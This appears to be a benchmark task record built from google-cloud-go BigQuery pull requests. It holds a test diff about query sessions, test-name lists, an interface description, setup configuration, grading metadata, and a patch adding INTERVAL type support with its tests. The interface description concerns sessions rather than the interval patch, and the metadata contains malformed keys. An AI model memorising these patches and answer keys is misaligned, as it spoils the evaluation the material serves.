t.Fatalf("couldn't instantiate base table: %v", err) } @@ -3114,7 +3159,7 @@ func TestIntegration_ModelLifecycle(t *testing.T) { UNION ALL SELECT 'b' AS f1, 3.8 AS label )`, modelRef) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer model.Delete(ctx) @@ -3297,7 +3342,7 @@ func TestIntegration_RoutineComplexTypes(t *testing.T) { (SELECT SUM(IF(elem.name = "foo",elem.val,null)) FROM UNNEST(arr) AS elem) )`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) @@ -3357,7 +3402,7 @@ func TestIntegration_RoutineLifecycle(t *testing.T) { sql := fmt.Sprintf(` CREATE FUNCTION `+"`%s`"+`(x INT64) AS (x * 3);`, routine.FullyQualifiedName()) - if _, err := runQueryJob(ctx, sql); err != nil { + if _, _, err := runQuerySQL(ctx, sql); err != nil { t.Fatal(err) } defer routine.Delete(ctx) diff --git a/bigquery/query_test.go b/bigquery/query_test.go index f3d9660201..3b292b77b9 100644 --- a/bigquery/query_test.go +++ b/bigquery/query_test.go @@ -323,6 +323,27 @@ func TestQuery(t *testing.T) { return j }(), }, + { + dst: c.Dataset("dataset-id").Table("table-id"), + src: &QueryConfig{ + Q: "query string", + DefaultProjectID: "def-project-id", + DefaultDatasetID: "def-dataset-id", + ConnectionProperties: []*ConnectionProperty{ + {Key: "key-a", Value: "value-a"}, + {Key: "key-b", Value: "value-b"}, + }, + }, + want: func() *bq.Job { + j := defaultQueryJob() + j.Configuration.Query.ForceSendFields = nil + j.Configuration.Query.ConnectionProperties = []*bq.ConnectionProperty{ + {Key: "key-a", Value: "value-a"}, + {Key: "key-b", Value: "value-b"}, + } + return j + }(), + }, } for i, tc := range testCases { query := c.Query("")
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/NaN", "TestNullFloat64JSON/minus_short_infinity", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
Function: runQueryJob(ctx context.Context, q *Query) (*JobStatistics, *QueryStatistics, error) Location: bigquery/integration_test.go (production implementation in bigquery/job.go is unchanged; test calls the exported helper) Inputs: - ctx – request‑level context controlling cancellation and deadlines. - q – a *bigquery.Query object that encapsulates the SQL text, destination, and the new fields CreateSession and ConnectionProperties. Outputs: - *JobStatistics – job‑level metrics, now includes SessionInfo when a session is created. - *QueryStatistics – query‑specific statistics (row count, bytes processed, etc.). - error – any failure while starting or monitoring the job (including 4xx HTTP errors that abort retries). Description: Executes the supplied Query object as a BigQuery job and returns both job‑wide and query‑specific statistics. The signature change allows callers to pass a fully built Query (with session‑related options) and to retrieve session information from the returned JobStatistics. Struct: QueryConfig Location: bigquery/query.go Fields (new/changed): - CreateSession bool – when true, BigQuery creates a new temporary session for the query. - ConnectionProperties []*ConnectionProperty – optional key/value pairs sent with the query request (e.g., session_id). Description: Configuration object used by Query to build the underlying BigQuery job configuration. The added fields enable session creation and the passing of arbitrary connection properties. Struct: ConnectionProperty Location: bigquery/query.go Fields: - Key string – name of the connection property. - Value string – value of the connection property. Description: Represents a single key/value pair that can be attached to a Query via QueryConfig.ConnectionProperties. Used by the test to propagate a session ID to a subsequent query. Method: (*ConnectionProperty) toBQ() *bq.ConnectionProperty Location: bigquery/query.go Inputs: the receiver ConnectionProperty instance. Outputs: pointer to the corresponding protobuf representation used by the BQ client library. Description: Converts the public ConnectionProperty into the internal *bq.ConnectionProperty type required by the BigQuery API request. Struct: JobStatistics Location: bigquery/job.go Field (new): - SessionInfo *SessionInfo – populated when a job runs within a session. Description: Holds aggregate statistics for a completed job. The new SessionInfo field allows callers (e.g., the integration test) to retrieve the session identifier associated with the job. Struct: SessionInfo Location: bigquery/job.go Field: - SessionID string – identifier of the temporary session created for the job. Description: Encapsulates session metadata returned by BigQuery. Tests verify that a non‑empty SessionID is present after creating a temporary table with CreateSession=true and that the same ID is used in a subsequent query via ConnectionProperties.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 2, "num_modified_lines": 78, "pr_author": "shollyman", "pr_labels": [ "api: bigquery: Issues related to the BigQuery API.", "cla: yes: This human has signed the Contributor License Agreement.", "automerge: Merge the pull request once unit tests and other checks pass." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding session creation and connection properties to BigQuery queries and exposing session info in job statistics, which the tests verify. The provided test changes align with these requirements, checking that the new fields are set and that session IDs propagate. No signals of missing specifications, external dependencies, or hidden naming expectations are present. Therefore the task is clearly defined and solvable as described.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1c145f401131666e94fb3159d6967fddc007abcf
2022-04-18 21:20:52
googleapis__google-cloud-go-5907
diff --git a/bigquery/intervalvalue.go b/bigquery/intervalvalue.go new file mode 100644 index 0000000000..dc4510c33f --- /dev/null +++ b/bigquery/intervalvalue.go @@ -0,0 +1,321 @@ +// Copyright 2022 Google LLC +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package bigquery + +import ( + "bytes" + "fmt" + "strconv" + "time" +) + +// IntervalValue is a go type for representing BigQuery INTERVAL values. +// Intervals are represented using three distinct parts: +// * Years and Months +// * Days +// * Time (Hours/Mins/Seconds/Fractional Seconds). +// +// More information about BigQuery INTERVAL types can be found at: +// https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#interval_type +// +// IntervalValue is EXPERIMENTAL and subject to change or removal without notice. +type IntervalValue struct { + // In canonical form, Years and Months share a consistent sign and reduced + // to avoid large month values. + Years int32 + Months int32 + + // In canonical form, Days are independent of the other parts and can have it's + // own sign. There is no attempt to reduce larger Day values into the Y-M part. + Days int32 + + // In canonical form, the time parts all share a consistent sign and are reduced. + Hours int32 + Minutes int32 + Seconds int32 + // This represents the fractional seconds as nanoseconds. + SubSecondNanos int32 +} + +// String returns string representation of the interval value using the canonical format. +// The canonical format is as follows: +// +// [sign]Y-M [sign]D [sign]H:M:S[.F] +func (iv *IntervalValue) String() string { + // Don't canonicalize the current value. Instead, if it's not canonical, + // compute the canonical form and use that. + src := iv + if !iv.IsCanonical() { + src = iv.Canonicalize() + } + out := fmt.Sprintf("%d-%d %d %d:%d:%d", src.Years, int32abs(src.Months), src.Days, src.Hours, int32abs(src.Minutes), int32abs(src.Seconds)) + if src.SubSecondNanos != 0 { + mantStr := fmt.Sprintf("%09d", src.SubSecondNanos) + for len(mantStr) > 0 && mantStr[len(mantStr)-1:] == "0" { + mantStr = mantStr[0 : len(mantStr)-1] + } + out = fmt.Sprintf("%s.%s", out, mantStr) + } + return out +} + +// intervalPart is used for parsing string representations. +type intervalPart int + +const ( + yearsPart = iota + monthsPart + daysPart + hoursPart + minutesPart + secondsPart + subsecsPart +) + +func (i intervalPart) String() string { + knownParts := []string{"YEARS", "MONTHS", "DAYS", "HOURS", "MINUTES", "SECONDS", "SUBSECONDS"} + if i < 0 || int(i) > len(knownParts) { + return fmt.Sprintf("UNKNOWN(%d)", i) + } + return knownParts[i] +} + +// canonicalParts indicates the parse order for canonical format. +var canonicalParts = []intervalPart{yearsPart, monthsPart, daysPart, hoursPart, minutesPart, secondsPart, subsecsPart} + +// ParseInterval parses an interval in canonical string format and returns the IntervalValue it represents. +func ParseInterval(value string) (*IntervalValue, error) { + iVal := &IntervalValue{} + for _, part := range canonicalParts { + remaining, v, err := getPartValue(part, value) + if err != nil { + return nil, err + } + switch part { + case yearsPart: + iVal.Years = v + case monthsPart: + iVal.Months = v + if iVal.Years < 0 { + iVal.Months = -v + } + case daysPart: + iVal.Days = v + case hoursPart: + iVal.Hours = v + case minutesPart: + iVal.Minutes = v + if iVal.Hours < 0 { + iVal.Minutes = -v + } + case secondsPart: + iVal.Seconds = v + if iVal.Hours < 0 { + iVal.Seconds = -v + } + case subsecsPart: + iVal.SubSecondNanos = v + if iVal.Hours < 0 { + iVal.SubSecondNanos = -v + } + default: + return nil, fmt.Errorf("encountered invalid part %s during parse", part) + } + value = remaining + } + return iVal, nil +} + +func getPartValue(part intervalPart, s string) (string, int32, error) { + s = trimPrefix(part, s) + return getNumVal(part, s) +} + +// trimPrefix removes formatting prefix relevant to the given type. +func trimPrefix(part intervalPart, s string) string { + var trimByte byte + switch part { + case yearsPart, daysPart, hoursPart: + trimByte = byte(' ') + case monthsPart: + trimByte = byte('-') + case minutesPart, secondsPart: + trimByte = byte(':') + case subsecsPart: + trimByte = byte('.') + } + for len(s) > 0 && s[0] == trimByte { + s = s[1:] + } + return s +} + +func getNumVal(part intervalPart, s string) (string, int32, error) { + + allowedVals := []byte("0123456789") + var allowedSign bool + captured := "" + switch part { + case yearsPart, daysPart, hoursPart: + allowedSign = true + } + // capture sign prefix +/- + if len(s) > 0 && allowedSign { + switch s[0] { + case '-': + captured = "-" + s = s[1:] + case '+': + s = s[1:] + } + } + for len(s) > 0 && bytes.IndexByte(allowedVals, s[0]) >= 0 { + captured = captured + string(s[0]) + s = s[1:] + } + + if len(captured) == 0 { + if part == subsecsPart { + return s, 0, nil + } + return "", 0, fmt.Errorf("no value parsed for part %s", part.String()) + } + // special case: subsecs is a mantissa, convert it to nanos + if part == subsecsPart { + parsed, err := strconv.ParseFloat(fmt.Sprintf("0.%s", captured), 64) + if err != nil { + return "", 0, fmt.Errorf("couldn't parse %s as %s", captured, part.String()) + } + return s, int32(parsed * 1e9), nil + } + parsed, err := strconv.ParseInt(captured, 10, 32) + if err != nil { + return "", 0, fmt.Errorf("error parsing value %s for %s: %v", captured, part.String(), err) + } + return s, int32(parsed), nil +} + +// IntervalValueFromDuration converts a time.Duration to an IntervalType representation. +// +// The converted duration only leverages the hours/minutes/seconds part of the interval, +// the other parts representing days, months, and years are not used. +func IntervalValueFromDuration(in time.Duration) *IntervalValue { + nanos := in.Nanoseconds() + out := &IntervalValue{} + out.Hours = int32(nanos / 3600 / 1e9) + nanos = nanos - (int64(out.Hours) * 3600 * 1e9) + out.Minutes = int32(nanos / 60 / 1e9) + nanos = nanos - (int64(out.Minutes) * 60 * 1e9) + out.Seconds = int32(nanos / 1e9) + nanos = nanos - (int64(out.Seconds) * 1e9) + out.SubSecondNanos = int32(nanos) + return out +} + +// ToDuration converts an interval to a time.Duration value. +// +// For the purposes of conversion: +// Years are normalized to 12 months. +// Months are normalized to 30 days. +// Days are normalized to 24 hours. +func (iv *IntervalValue) ToDuration() time.Duration { + var accum int64 + accum = 12*int64(iv.Years) + int64(iv.Months) + // widen to days + accum = accum*30 + int64(iv.Days) + // hours + accum = accum*24 + int64(iv.Hours) + // minutes + accum = accum*60 + int64(iv.Minutes) + // seconds + accum = accum*60 + int64(iv.Seconds) + // subsecs + accum = accum*1e9 + int64(iv.SubSecondNanos*1e9) + return time.Duration(accum) +} + +// Canonicalize returns an IntervalValue where signs for elements in the +// Y-M and H:M:S.F are consistent and values are normalized/reduced. +// +// Canonical form enables more consistent comparison of the encoded +// interval. For example, encoding an interval with 12 months is equivalent +// to an interval of 1 year. +func (iv *IntervalValue) Canonicalize() *IntervalValue { + newIV := &IntervalValue{iv.Years, iv.Months, iv.Days, iv.Hours, iv.Minutes, iv.Seconds, iv.SubSecondNanos} + // canonicalize Y-M part + totalMonths := iv.Years*12 + iv.Months + newIV.Years = totalMonths / 12 + totalMonths = totalMonths - (newIV.Years * 12) + newIV.Months = totalMonths % 12 + + // No canonicalization for the Days part. + + // canonicalize time part by switching to Nanos. + totalNanos := int64(iv.Hours)*3600*1e9 + + int64(iv.Minutes)*60*1e9 + + int64(iv.Seconds)*1e9 + + int64(iv.SubSecondNanos) + + // Reduce to parts. + newIV.Hours = int32(totalNanos / 60 / 60 / 1e9) + totalNanos = totalNanos - (int64(newIV.Hours) * 3600 * 1e9) + newIV.Minutes = int32(totalNanos / 60 / 1e9) + totalNanos = totalNanos - (int64(newIV.Minutes) * 60 * 1e9) + newIV.Seconds = int32(totalNanos / 1e9) + totalNanos = totalNanos - (int64(newIV.Seconds) * 1e9) + newIV.SubSecondNanos = int32(totalNanos) + return newIV +} + +// IsCanonical evaluates whether the current representation is in canonical +// form. +func (iv *IntervalValue) IsCanonical() bool { + if !sameSign(iv.Years, iv.Months) || + !sameSign(iv.Hours, iv.Minutes) { + return false + } + // We allow large days and hours values, because they are within different parts. + if int32abs(iv.Months) > 12 || + int32abs(iv.Minutes) > 60 || + int32abs(iv.Seconds) > 60 || + int32abs(iv.SubSecondNanos) > 1e9 { + return false + } + // TODO: We don't currently validate that each part represents value smaller than 10k years. + return true +} + +func int32abs(x int32) int32 { + if x < 0 { + return -x + } + return x +} + +func sameSign(nums ...int32) bool { + var pos, neg int + for _, n := range nums { + if n > 0 { + pos = pos + 1 + } + if n < 0 { + neg = neg + 1 + } + } + if pos > 0 && neg > 0 { + return false + } + return true +} diff --git a/bigquery/params.go b/bigquery/params.go index 1171d50cbb..3c8f0f55be 100644 --- a/bigquery/params.go +++ b/bigquery/params.go @@ -77,14 +77,16 @@ var ( numericParamType = &bq.QueryParameterType{Type: "NUMERIC"} bigNumericParamType = &bq.QueryParameterType{Type: "BIGNUMERIC"} geographyParamType = &bq.QueryParameterType{Type: "GEOGRAPHY"} + intervalParamType = &bq.QueryParameterType{Type: "INTERVAL"} ) var ( - typeOfDate = reflect.TypeOf(civil.Date{}) - typeOfTime = reflect.TypeOf(civil.Time{}) - typeOfDateTime = reflect.TypeOf(civil.DateTime{}) - typeOfGoTime = reflect.TypeOf(time.Time{}) - typeOfRat = reflect.TypeOf(&big.Rat{}) + typeOfDate = reflect.TypeOf(civil.Date{}) + typeOfTime = reflect.TypeOf(civil.Time{}) + typeOfDateTime = reflect.TypeOf(civil.DateTime{}) + typeOfGoTime = reflect.TypeOf(time.Time{}) + typeOfRat = reflect.TypeOf(&big.Rat{}) + typeOfIntervalValue = reflect.TypeOf(&IntervalValue{}) ) // A QueryParameter is a parameter to a query. @@ -106,6 +108,7 @@ type QueryParameter struct { // []byte: BYTES // time.Time: TIMESTAMP // *big.Rat: NUMERIC + // *IntervalValue: INTERVAL // Arrays and slices of the above. // Structs of the above. Only the exported fields are used. // @@ -156,6 +159,8 @@ func paramType(t reflect.Type) (*bq.QueryParameterType, error) { return timestampParamType, nil case typeOfRat: return numericParamType, nil + case typeOfIntervalValue: + return intervalParamType, nil case typeOfNullBool: return boolParamType, nil case typeOfNullFloat64: @@ -300,6 +305,9 @@ func paramValue(v reflect.Value) (*bq.QueryParameterValue, error) { // to honor previous behavior and send as Numeric type. res.Value = NumericString(v.Interface().(*big.Rat)) return res, nil + case typeOfIntervalValue: + res.Value = IntervalString(v.Interface().(*IntervalValue)) + return res, nil } switch t.Kind() { case reflect.Slice: @@ -379,6 +387,7 @@ var paramTypeToFieldType = map[string]FieldType{ numericParamType.Type: NumericFieldType, bigNumericParamType.Type: BigNumericFieldType, geographyParamType.Type: GeographyFieldType, + intervalParamType.Type: IntervalFieldType, } // Convert a parameter value from the service to a Go value. This is similar to, but diff --git a/bigquery/schema.go b/bigquery/schema.go index 78f2f76286..f5e2d4130d 100644 --- a/bigquery/schema.go +++ b/bigquery/schema.go @@ -242,6 +242,8 @@ const ( // BigNumericFieldType is a numeric field type that supports values of larger precision // and scale than the NumericFieldType. BigNumericFieldType FieldType = "BIGNUMERIC" + // IntervalFieldType is a representation of a duration or an amount of time. + IntervalFieldType FieldType = "INTERVAL" ) var ( @@ -260,6 +262,7 @@ var ( NumericFieldType: true, GeographyFieldType: true, BigNumericFieldType: true, + IntervalFieldType: true, } // The API will accept alias names for the types based on the Standard SQL type names. fieldAliases = map[FieldType]FieldType{ diff --git a/bigquery/value.go b/bigquery/value.go index cae28be046..84e55acaae 100644 --- a/bigquery/value.go +++ b/bigquery/value.go @@ -735,6 +735,13 @@ func toUploadValueReflect(v reflect.Value, fs *FieldSchema) interface{} { return formatUploadValue(v, fs, func(v reflect.Value) string { return BigNumericString(v.Interface().(*big.Rat)) }) + case IntervalFieldType: + if r, ok := v.Interface().(*IntervalValue); ok && r == nil { + return nil + } + return formatUploadValue(v, fs, func(v reflect.Value) string { + return IntervalString(v.Interface().(*IntervalValue)) + }) default: if !fs.Repeated || v.Len() > 0 { return v.Interface() @@ -821,6 +828,12 @@ func BigNumericString(r *big.Rat) string { return r.FloatString(BigNumericScaleDigits) } +// IntervalString returns a string representing an *IntervalValue in a format compatible with +// BigQuery SQL. It returns an interval literal in canonical format. +func IntervalString(iv *IntervalValue) string { + return iv.String() +} + // convertRows converts a series of TableRows into a series of Value slices. // schema is used to interpret the data from rows; its length must match the // length of each row. @@ -947,6 +960,12 @@ func convertBasicType(val string, typ FieldType) (Value, error) { return Value(r), nil case GeographyFieldType: return val, nil + case IntervalFieldType: + i, err := ParseInterval(val) + if err != nil { + return nil, fmt.Errorf("bigquery: invalid INTERVAL value %q", val) + } + return Value(i), nil default: return nil, fmt.Errorf("unrecognized type: %s", typ) }
feat(bigquery): add interval support This PR adds INTERVAL type support to cloud.google.com/go/bigquery It includes a new go type (IntervalValue), which can be used to represent/manipulate an interval value. It also includes requisite param support (using IntervalValue). Conversions between IntervalValue and time.Duration are also supported, but you can't directly supply time.Duration as a query param without first converting. Questions to Resolve: * **Should IntervalValue live in the bigquery/types directory, or should this live elsewhere?** It's not a civil type, so it doesn't belong in cloud.google.com/go/civil. It _may_ someday be supported by other SQL engines, so perhaps a more general sqltypes? Status: **RESOLVED**. Moved IntervalValue into the main bigquery package rather than a types sub-package. * **Do we need to support ISO8601 duration parsing/conversion?** Out of scope for current FR, but is there anything in the existing signatures that should change to support it? Should ParseInterval() accept a format string, or should there be a ParseInternalFrom8601Duration() or similar?
**Title** Add full support for the BigQuery INTERVAL data type **Problem** The client library could not represent, serialize, or deserialize BigQuery INTERVAL values, making it impossible to use intervals in query parameters, schema definitions, or result rows. This gap caused runtime errors when users attempted to work with interval data. **Root Cause** The library’s type system, parameter handling, schema metadata, and value conversion logic lacked definitions and mappings for the INTERVAL type. **Fix / Expected Behavior** - Introduce a Go representation for interval values, including canonical string formatting, parsing, and conversion to/from `time.Duration`. - Enable interval literals to be used as query parameters and correctly typed in schema definitions. - Map the new interval type to the appropriate BigQuery field type throughout the client (parameter type detection, field‑type mapping, upload formatting, and result conversion). - Ensure nil interval values are handled gracefully during uploads. - Preserve existing behavior for all other data types. **Risk & Validation** - Verify that interval parameters are sent to the service in the expected canonical format and that queries execute without errors. - Confirm that interval fields returned in query results are correctly parsed back into the new Go type. - Run the full test suite and add targeted tests for interval handling to guard against regressions in existing data‑type processing.
5,907
googleapis/google-cloud-go
diff --git a/bigquery/intervalvalue_test.go b/bigquery/intervalvalue_test.go new file mode 100644 index 0000000000..f657eb4a1c --- /dev/null +++ b/bigquery/intervalvalue_test.go @@ -0,0 +1,179 @@ +// Copyright 2022 Google LLC +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package bigquery + +import ( + "testing" + "time" + + "cloud.google.com/go/internal/testutil" +) + +func TestParseInterval(t *testing.T) { + testcases := []struct { + inputStr string + wantInterval *IntervalValue + wantErr bool + }{ + { + inputStr: "", + wantErr: true, + }, + { + inputStr: "1-2 3", + wantErr: true, + }, + { + inputStr: "1-2 3 4:5:6", + wantInterval: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + }, + { + inputStr: "1-2 3 4:5:6.5", + wantInterval: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 500000000}, + }, + { + inputStr: "-1-2 3 -4:5:6.123", + wantInterval: &IntervalValue{Years: -1, Months: -2, Days: 3, Hours: -4, Minutes: -5, Seconds: -6, SubSecondNanos: -123000000}, + }, + { + inputStr: "0-0 0 1:1:1.000000001", + wantInterval: &IntervalValue{Hours: 1, Minutes: 1, Seconds: 1, SubSecondNanos: 1}, + }, + } + + for _, tc := range testcases { + gotInterval, err := ParseInterval(tc.inputStr) + if tc.wantErr { + if err != nil { + continue + } + t.Errorf("input %s: wanted err, got success", tc.inputStr) + } + if err != nil { + t.Errorf("input %s got err: %v", tc.inputStr, err) + } + if diff := testutil.Diff(gotInterval, tc.wantInterval); diff != "" { + t.Errorf("input %s: got=-, want=+:\n%s", tc.inputStr, diff) + } + } +} + +func TestCanonicalInterval(t *testing.T) { + testcases := []struct { + description string + input *IntervalValue + wantCanonical *IntervalValue + wantString string + }{ + { + description: "already canonical", + input: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + wantCanonical: &IntervalValue{Years: 1, Months: 2, Days: 3, Hours: 4, Minutes: 5, Seconds: 6, SubSecondNanos: 0}, + wantString: "1-2 3 4:5:6", + }, + { + description: "mixed Y-M", + input: &IntervalValue{Years: -1, Months: 28}, + wantCanonical: &IntervalValue{Years: 1, Months: 4, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "1-4 0 0:0:0", + }, + { + description: "mixed Y-M", + input: &IntervalValue{Years: -1, Months: 28}, + wantCanonical: &IntervalValue{Years: 1, Months: 4, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "1-4 0 0:0:0", + }, + { + description: "big month Y-M", + input: &IntervalValue{Years: 0, Months: -13}, + wantCanonical: &IntervalValue{Years: -1, Months: -1, Days: 0, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "-1-1 0 0:0:0", + }, + { + description: "big days not normalized", + input: &IntervalValue{Days: 1000}, + wantCanonical: &IntervalValue{Years: 0, Months: 0, Days: 1000, Hours: 0, Minutes: 0, Seconds: 0, SubSecondNanos: 0}, + wantString: "0-0 1000 0:0:0", + }, + { + description: "time reduced", + input: &IntervalValue{Minutes: 181, Seconds: 61, SubSecondNanos: 5}, + wantCanonical: &IntervalValue{Hours: 3, Minutes: 2, Seconds: 1, SubSecondNanos: 5}, + wantString: "0-0 0 3:2:1.000000005", + }, + { + description: "subseconds oversized", + input: &IntervalValue{SubSecondNanos: 1900000000}, + wantCanonical: &IntervalValue{Years: 0, Months: 0, Days: 0, Hours: 0, Minutes: 0, Seconds: 1, SubSecondNanos: 900000000}, + wantString: "0-0 0 0:0:1.9", + }, + } + + for _, tc := range testcases { + gotCanonical := tc.input.Canonicalize() + + if diff := testutil.Diff(gotCanonical, tc.wantCanonical); diff != "" { + t.Errorf("%s: got=-, want=+:\n%s", tc.description, diff) + } + + gotStr := tc.input.String() + if gotStr != tc.wantString { + t.Errorf("%s mismatched strings. got %s want %s", tc.description, gotStr, tc.wantString) + } + } +} + +func TestIntervalDuration(t *testing.T) { + testcases := []struct { + description string + inputInterval *IntervalValue + wantDuration time.Duration + wantInterval *IntervalValue + }{ + { + description: "hour", + inputInterval: &IntervalValue{Hours: 1}, + wantDuration: time.Duration(time.Hour), + wantInterval: &IntervalValue{Hours: 1}, + }, + { + description: "minute oversized", + inputInterval: &IntervalValue{Minutes: 62}, + wantDuration: time.Duration(62 * time.Minute), + wantInterval: &IntervalValue{Hours: 1, Minutes: 2}, + }, + { + description: "other parts", + inputInterval: &IntervalValue{Months: 1, Days: 2}, + wantDuration: time.Duration(32 * 24 * time.Hour), + wantInterval: &IntervalValue{Hours: 32 * 24}, + }, + } + + for _, tc := range testcases { + gotDuration := tc.inputInterval.ToDuration() + + // interval -> duration + if gotDuration != tc.wantDuration { + t.Errorf("%s: mismatched duration, got %v want %v", tc.description, gotDuration, tc.wantDuration) + } + + // duration -> interval (canonical) + gotInterval := IntervalValueFromDuration(gotDuration) + if diff := testutil.Diff(gotInterval, tc.wantInterval); diff != "" { + t.Errorf("%s: got=-, want=+:\n%s", tc.description, diff) + } + } +} diff --git a/bigquery/params_test.go b/bigquery/params_test.go index d9233cad6e..366184894a 100644 --- a/bigquery/params_test.go +++ b/bigquery/params_test.go @@ -116,6 +116,7 @@ var scalarTests = []struct { dateTimeParamType, NullDateTime{Valid: false}}, {big.NewRat(12345, 1000), false, "12.345000000", numericParamType, big.NewRat(12345, 1000)}, + {&IntervalValue{Years: 1, Months: 2, Days: 3}, false, "1-2 3 0:0:0", intervalParamType, &IntervalValue{Years: 1, Months: 2, Days: 3}}, {NullGeography{GeographyVal: "POINT(-122.335503 47.625536)", Valid: 